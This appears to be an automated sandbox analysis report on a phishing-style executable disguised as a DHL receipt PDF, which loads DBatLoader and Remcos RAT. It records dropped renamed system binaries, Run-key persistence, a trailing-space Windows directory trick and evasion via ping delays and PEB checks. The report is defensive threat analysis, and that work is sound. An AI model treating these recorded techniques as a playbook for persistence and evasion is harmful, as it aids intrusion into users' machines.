              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: userenv.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: netutils.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: amsi.dllJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\Public\xkn.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: DHL119040 receipt document,pdf.exeStatic file information: File size 1390592 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
              Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\Public\Libraries\yfkwifxL.pifUnpacked PE file: 1.2.yfkwifxL.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;
              Yara detected DBatLoader
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: yfkwifxL.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7CC8
              Source: alpha.exe.6.drStatic PE information: section name: .didat
              Source: per.exe.14.drStatic PE information: section name: .imrsiv
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BD2E4 push ecx; mov dword ptr [esp], edx0_2_028BD2E9
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028CA2FC push 028CA367h; ret 0_2_028CA35F
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A32FC push eax; ret 0_2_028A3338
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A635A push 028A63B7h; ret 0_2_028A63AF
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A635C push 028A63B7h; ret 0_2_028A63AF
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028CA0AC push 028CA125h; ret 0_2_028CA11D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B3003 push 028B3051h; ret 0_2_028B3049
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B3004 push 028B3051h; ret 0_2_028B3049
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028CB1A4 pushad ; retf 0_2_028CB1A5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028CA1F8 push 028CA288h; ret 0_2_028CA280
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028CA144 push 028CA1ECh; ret 0_2_028CA1E4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A674E push 028A6792h; ret 0_2_028A678A
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A6750 push 028A6792h; ret 0_2_028A678A
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028AC504 push ecx; mov dword ptr [esp], edx0_2_028AC509
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028AD538 push 028AD564h; ret 0_2_028AD55C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028ACB84 push 028ACD0Ah; ret 0_2_028ACD02
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B78A4 push 028B7921h; ret 0_2_028B7919
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028AC8B2 push 028ACD0Ah; ret 0_2_028ACD02
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B68DE push 028B698Bh; ret 0_2_028B6983
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B68E0 push 028B698Bh; ret 0_2_028B6983
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028C9874 push 028C9A60h; ret 0_2_028C9A58
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028CDE98 push eax; ret 0_2_028CDF68
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B9EBB push 028B9EF4h; ret 0_2_028B9EEC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B9EBC push 028B9EF4h; ret 0_2_028B9EEC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B2EF8 push 028B2F6Eh; ret 0_2_028B2F66
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B5E14 push ecx; mov dword ptr [esp], edx0_2_028B5E16
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7F18 push 028B7F50h; ret 0_2_028B7F48
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B7C7C push 028B7CBEh; ret 0_2_028B7CB6
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA74E56 push ecx; ret 0_2_2DA74E69
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA97A28 push eax; ret 0_2_2DA97A46
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA9B132 push esp; ret 0_2_2DA9B141

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeFile created: C:\Users\Public\Libraries\yfkwifxL.pifJump to dropped file
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\per.exeJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA46EB0 ShellExecuteW,URLDownloadToFileW,0_2_2DA46EB0
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeFile created: C:\Users\Public\Libraries\yfkwifxL.pifJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Windows \System32\per.exeJump to dropped file

              Boot Survival

              barindex
              Creates autostart registry keys with suspicious names
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5Jump to behavior
              Creates multiple autostart registry keys
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LxfiwkfyJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5Jump to behavior
              Drops PE files to the user root directory
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_2DA5AB0D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LxfiwkfyJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LxfiwkfyJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5Jump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5Jump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5Jump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5Jump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B9EF8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_028B9EF8
              Source: C:\ProgramData\Remcos\remcos.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Contains functionality to detect sleep reduction / modifications
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028BCD740_2_028BCD74
              Delayed program exit found
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4F7A7 Sleep,ExitProcess,0_2_2DA4F7A7
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5AF7A7 Sleep,ExitProcess,5_2_2D5AF7A7
              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-84394
              Powershell is started from unusual location (likely to bypass HIPS)
              Source: c:\users\public\xkn.exeKey value queried: Powershell behavior
              Uses ping.exe to sleep
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Users\Public\xkn.exeMemory allocated: 151BB7A0000 memory reserve | memory write watch
              Source: C:\Users\Public\xkn.exeMemory allocated: 151BB7A0000 memory reserve | memory write watch
